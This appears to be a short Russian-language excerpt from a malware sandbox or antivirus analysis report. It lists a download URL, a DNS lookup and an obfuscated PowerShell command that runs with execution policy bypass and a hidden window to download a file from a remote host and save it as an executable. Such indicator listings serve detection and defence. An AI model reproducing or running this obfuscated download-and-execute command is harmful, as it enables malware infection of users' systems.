Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^WE^rs^H^el^l^.eXe ^-^e^XeCutI^O^NpoL^iCY BY^PAS^S ^-nO^Pr^oFIl^e^ -W^i^N^d^OwStYl^e h^iD^dEN ^(^Ne^w-o^BJ^E^CT sy^StEm^.NE^T.WebCLi^Ent).^D^o^w^nlO^a^dfIle('http://smoer...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "P^O^WE^rs^H^el^l^.eXe ^-^e^XeCutI^O^NpoL^iCY BY^PAS^S ^-nO^Pr^oFIl^e^ -W^i^N^d^OwStYl^e h^iD^dEN ^(^Ne^w-o^BJ^E^CT sy^StEm^.NE^T.WebCLi^Ent).^D^o^w^nlO^a^dfIle('http://smoer...' (со скрытым окном)